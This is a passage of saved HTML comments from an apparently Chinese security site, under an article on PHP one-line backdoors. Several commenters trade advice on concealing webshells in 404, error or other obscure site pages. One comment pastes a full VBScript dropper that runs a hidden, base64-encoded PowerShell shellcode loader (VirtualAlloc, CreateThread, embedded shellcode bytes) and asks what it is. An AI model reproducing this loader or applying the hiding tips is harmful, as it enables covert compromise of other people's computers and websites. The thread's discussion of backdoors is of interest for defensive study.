<div class="vote" id="vote-9121"><span id="acv_stat_9121"></span><a class="ilike_icon" id="vote4-9121" href="javascript:acv_vote(9121,1);">亮了</a>(<span id="cos_support-9121">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9121" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9121" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9121" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9121" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9121" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment odd alt thread-odd thread-alt depth-1" id="li-comment-71553">
    <div id="comment-71553">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic17.png">     </div>
    <div class="tit"> 
	    <span class="name"> ZurV2w1n<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71553&#39;,&#39;71553&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71553#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">14楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>404页面太猥琐了 嘎嘎<img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/cool_org.gif" title="酷"><img data-original="http://timg.sjs.sinajs.cn/t3/style/images/common/face/ext/normal/40/cool_org.gif" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/grey.gif" title="酷"></p>
<noscript>&lt;img src="http://timg.sjs.sinajs.cn/t3/style/images/common/face/ext/normal/40/cool_org.gif" title="酷" /&gt;&lt;img src="http://timg.sjs.sinajs.cn/t3/style/images/common/face/ext/normal/40/cool_org.gif" title="酷" /&gt;</noscript>
<div class="comment-tools">
<div class="vote" id="vote-71553"><span id="acv_stat_71553"></span><a class="ilike_icon" id="vote4-71553" href="javascript:acv_vote(71553,1);">亮了</a>(<span id="cos_support-71553">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71553" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71553" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71553" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71553" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71553" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even thread-even depth-1" id="li-comment-9127">
    <div id="comment-9127">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic12.png">     </div>
    <div class="tit"> 
	    <span class="name"> black-world </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-12</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9127&#39;,&#39;9127&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9127#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">15楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>武术乃千变万化！！！</p>
<div class="comment-tools">
<div class="vote" id="vote-9127"><span id="acv_stat_9127"></span><a class="ilike_icon" id="vote4-9127" href="javascript:acv_vote(9127,1);">亮了</a>(<span id="cos_support-9127">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9127" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9127" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9127" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9127" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9127" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-3071 odd alt thread-odd thread-alt depth-1" id="li-comment-9172">
    <div id="comment-9172">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E7%8E%84%E7%A9%BA">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/狐狸.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E7%8E%84%E7%A9%BA" target="_blank">玄空&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain"> 一个弱弱的小彩笔 </span>
		<span class="time">&nbsp;2013-05-13</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9172&#39;,&#39;9172&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9172#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">16楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>404已经快被用烂了吧。个人觉得还是在一些比较隐蔽的页面，比如说top，left啊。比较好，error也是个不错的选择</p>
<div class="comment-tools">
<div class="vote" id="vote-9172"><span id="acv_stat_9172"></span><a class="ilike_icon" id="vote4-9172" href="javascript:acv_vote(9172,1);">亮了</a>(<span id="cos_support-9172">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9172" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9172" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9172" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9172" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9172" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even thread-even depth-1" id="li-comment-71552">
    <div id="comment-71552">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic1.png">     </div>
    <div class="tit"> 
	    <span class="name"> Websecurity<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-14</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71552&#39;,&#39;71552&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71552#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">17楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>哈哈……</p>
<div class="comment-tools">
<div class="vote" id="vote-71552"><span id="acv_stat_71552"></span><a class="ilike_icon" id="vote4-71552" href="javascript:acv_vote(71552,1);">亮了</a>(<span id="cos_support-71552">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71552" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71552" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71552" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71552" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71552" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment odd alt thread-odd thread-alt depth-1" id="li-comment-9290">
    <div id="comment-9290">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic5.png">     </div>
    <div class="tit"> 
	    <span class="name"> horseluke </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-14</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9290&#39;,&#39;9290&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9290#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">18楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>有关php后门的延伸阅读，可见monyer在一年前的文章：<br>
http://hi.baidu.com/monyer/item/a218dbadf2afc7a828ce9d63</p>
<div class="comment-tools">
<div class="vote" id="vote-9290"><span id="acv_stat_9290"></span><a class="ilike_icon" id="vote4-9290" href="javascript:acv_vote(9290,1);">亮了</a>(<span id="cos_support-9290">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9290" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9290" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9290" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9290" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9290" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-oooceo bypostauthor even depth-2" id="li-comment-9359">
    <div id="comment-9359">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-14</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9359&#39;,&#39;9359&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9359#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@horseluke 文章引述的国外参考资料非常帅，感谢！</p>
<div class="comment-tools">
<div class="vote" id="vote-9359"><span id="acv_stat_9359"></span><a class="ilike_icon" id="vote4-9359" href="javascript:acv_vote(9359,1);">亮了</a>(<span id="cos_support-9359">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9359" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9359" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9359" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9359" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9359" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment odd alt thread-even depth-1" id="li-comment-9374">
    <div id="comment-9374">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic17.png">     </div>
    <div class="tit"> 
	    <span class="name"> lkjk </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-14</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9374&#39;,&#39;9374&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9374#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">19楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>请问这是什么 后门？</p>
<p>Set ws = CreateObject("Wscript.Shell")</p>
<p>ws.run "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand JABjAG8AZABlACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3AGkAbgBGAHUAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAYwBvAGQAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABzAGMANgA0ACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAOQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADYANAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADMAMAAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAA4AGIALAAwAHgANwAyACwAMAB4ADIAOAAsADAAeAAwAGYALAAwAHgAYgA3ACwAMAB4ADQAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADAALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYQAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4AGUAMwAsADAAeAAzAGMALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANAAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAyACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgAMwAzACwAMAB4ADMAMgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANwAzACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeABiADgALAAwAHgAOQAwACwAMAB4ADAAMQAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAOQAsADAAeABjADQALAAwAHgANQA0ACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAMgA5ACwAMAB4ADgAMAAsADAAeAA2AGIALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA3ACwAMAB4ADYAYQAsADAAeAAwADUALAAwAHgANgA4ACwAMAB4AGMAMAAsADAAeAA0ADUALAAwAHgAYwBjACwAMAB4AGUAMgAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4ADAAMAAsADAAeAAxADUALAAwAHgAYgAxACwAMAB4ADgAOQAsADAAeABlADYALAAwAHgANgBhACwAMAB4ADEAMAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAA5ADkALAAwAHgAYQA1ACwAMAB4ADcANAAsADAAeAA2ADEALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAAwAGMALAAwAHgAZgBmACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgANwA1ACwAMAB4AGUAYwAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABkADkALAAwAHgAYwA4ACwAMAB4ADUAZgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAYgAsADAAeAAzADYALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUANgAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANQA2ACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABkADkALAAwAHgAYwA4ACwAMAB4ADUAZgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAMgA5ACwAMAB4AGMANgAsADAAeAA4ADUALAAwAHgAZgA2ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgAYwAzADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgACQAcwBjADYANAA7ACQAcwBpAHoAZQAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABzAGMALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQAgAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwBpAG4ARgB1AG4AYwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAaQBuAEYAdQBuAGMAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAaQBuAEYAdQBuAGMAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQAgAHsAIABTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAIAB9ADsA",vbhide</p>
<div class="comment-tools">
<div class="vote" id="vote-9374"><span id="acv_stat_9374"></span><a class="ilike_icon" id="vote4-9374" href="javascript:acv_vote(9374,1);">亮了</a>(<span id="cos_support-9374">5</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9374" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9374" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9374" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9374" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9374" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-global_hacker even thread-odd thread-alt depth-1" id="li-comment-9454">
    <div id="comment-9454">
        <div class="photo"> <a href="http://www.freebuf.com/author/global_hacker">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/QQ圖片20140401200158.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/global_hacker" target="_blank">global_hacker&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(4级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-15</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9454&#39;,&#39;9454&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9454#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">20楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>哈哈  404  使用的 是很烂了  但是 还哦是有   用啊</p>
<div class="comment-tools">
<div class="vote" id="vote-9454"><span id="acv_stat_9454"></span><a class="ilike_icon" id="vote4-9454" href="javascript:acv_vote(9454,1);">亮了</a>(<span id="cos_support-9454">1</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9454" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9454" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9454" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9454" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9454" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-3071 odd alt depth-2" id="li-comment-9772">
    <div id="comment-9772">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E7%8E%84%E7%A9%BA">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/狐狸.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E7%8E%84%E7%A9%BA" target="_blank">玄空&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain"> 一个弱弱的小彩笔 </span>
		<span class="time">&nbsp;2013-05-23</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9772&#39;,&#39;9772&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9772#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@global_hacker&nbsp;  error已经成为了我们的新欢了</p>
<div class="comment-tools">
<div class="vote" id="vote-9772"><span id="acv_stat_9772"></span><a class="ilike_icon" id="vote4-9772" href="javascript:acv_vote(9772,1);">亮了</a>(<span id="cos_support-9772">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9772" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9772" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9772" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
